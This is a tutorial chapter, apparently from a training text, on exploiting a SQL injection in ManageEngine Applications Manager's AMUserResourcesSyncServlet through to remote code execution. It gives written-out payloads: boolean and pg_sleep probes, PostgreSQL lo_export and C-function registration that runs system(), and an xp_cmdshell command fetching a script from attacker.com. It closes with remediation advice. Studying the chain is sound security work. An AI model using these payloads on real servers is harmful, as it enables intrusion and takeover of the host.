Chapter 5 ManageEngine Applications Manager AMUserResourcesSyncServlet SQL Injection RCE

Overview

This chapter examines a SQL injection vulnerability in the AMUserResourcesSyncServlet of ManageEngine Applications Manager. The servlet builds a database query from a request parameter without parameterisation, and because the query runs against the product's bundled database with a privileged account, the injection can be chained with the database's own file-system and extension features to achieve Remote Code Execution (RCE) on the server hosting Applications Manager.

Getting Started

  • Setting Up the Environment: Install the vulnerable version of ManageEngine Applications Manager in an isolated lab. Note that the product installs with a bundled PostgreSQL database by default (a Microsoft SQL Server backend is an install-time option), which determines the exploitation route later in the chapter. Place an intercepting proxy between your browser and the application so that every request to the servlet can be captured, modified and replayed.

Vulnerability Discovery

  1. Servlet Mappings and Initial Analysis:
  • Identify that AMUserResourcesSyncServlet handles user resource synchronization requests.

  • Determine the servlet’s URL mapping and the parameters it reads from web.xml (under the application’s WEB-INF directory) or by observing the application’s own HTTP traffic in the proxy. A request to the mapped path looks like the following; the parameter names in this chapter are placeholders and the real ones must be taken from the servlet code:

GET /servlet/AMUserResourcesSyncServlet?sync=true HTTP/1.1
Host: vulnerable-manageengine.com

  2. Source Code Recovery and Analysis:
  • Recover the servlet’s source by decompiling the Java bytecode (the .class files packaged in the application’s jar files) with a decompiler such as JD-GUI, then trace each request parameter from its getParameter() call to the point where it is used.

  • Search for SQL built by string concatenation (for example "... WHERE userid = " + request.getParameter(...)) and executed through a plain Statement rather than a PreparedStatement; every such site is a candidate injection point.

  3. Triggering the Vulnerability:
  • Send malformed input such as an unbalanced single quote to the suspected parameter. A verbose SQL error in the response confirms that the input reaches the database, and the error text often discloses the backend type, the query text and table or column names.

  • Alter the query’s logic with a boolean condition and compare the response to that of an unmodified request. The payload is shown URL-decoded; spaces and special characters must be percent-encoded in the actual request:

GET /servlet/AMUserResourcesSyncServlet?userID=1 OR 1=1-- HTTP/1.1
Host: vulnerable-manageengine.com

Exploitation of the Vulnerability

  1. Crafting SQL Injection Payloads:
  • Build payloads from the injection point that change or extend the original query: boolean conditions, UNION SELECT against the database catalogue for unauthorized reads, and stacked queries (additional statements appended after a semicolon). Stacked queries work here because the concatenated query is executed as a plain JDBC Statement against PostgreSQL, which accepts several semicolon-separated statements in one call; they are what turn the injection into arbitrary statement execution.

  • When the response shows neither an error nor a visible data difference, confirm the injection with a time-based payload and compare the response time against a baseline request. A stacked call to pg_sleep() that delays the response by the requested number of seconds proves both the injection and stacked-query execution:

userID=1; SELECT pg_sleep(10);--
  2. Achieving Remote Code Execution:
  • Applications Manager installs with a bundled PostgreSQL database, so code execution is obtained through PostgreSQL features rather than a SQL Server procedure. With a superuser database account, the stacked injection can write arbitrary bytes to the server’s file system (a large object filled page by page through pg_largeobject, or with lo_put on newer servers, then written to a path with lo_export) and register that file as a C user-defined function with CREATE FUNCTION ... LANGUAGE C. A library whose exported function calls system() then runs any command, including a reverse shell, as the database’s operating-system user.

  • The library must be compiled against the target’s PostgreSQL major version and declare PG_MODULE_MAGIC, otherwise the server refuses to load it; on a Windows installation it is a DLL rather than a .so. Once the upload is complete, three further stacked statements export the library, register the function and run it. The large object id, path and function name below are placeholders, and the first command is a harmless probe to confirm execution before a reverse shell is attempted:

userID=1; SELECT lo_export(12345, '/tmp/libexec.so');--
userID=1; CREATE OR REPLACE FUNCTION sys(cstring) RETURNS int AS '/tmp/libexec.so', 'sys' LANGUAGE C STRICT;--
userID=1; SELECT sys('id > /tmp/probe.txt');--

  • Only when the instance was configured to use Microsoft SQL Server does the xp_cmdshell route apply, and xp_cmdshell is disabled by default and requires sysadmin rights to enable with sp_configure:

userID=1; EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://attacker.com/shell.ps1 -OutFile C:\shell.ps1"';--

Summary

This chapter demonstrates why user input must never be concatenated into SQL: the fix on the application side is a PreparedStatement with bound parameters for every query the servlet builds, combined with input validation of the expected numeric identifiers. It also shows why the database account matters as much as the query: running the application as a PostgreSQL superuser is what turns a data-access bug into code execution, so the account should hold only the privileges the application needs and must not be able to use lo_export or CREATE FUNCTION ... LANGUAGE C. The exercises encourage hands-on exploitation, emphasizing the importance of thorough testing and validation in web application security practices.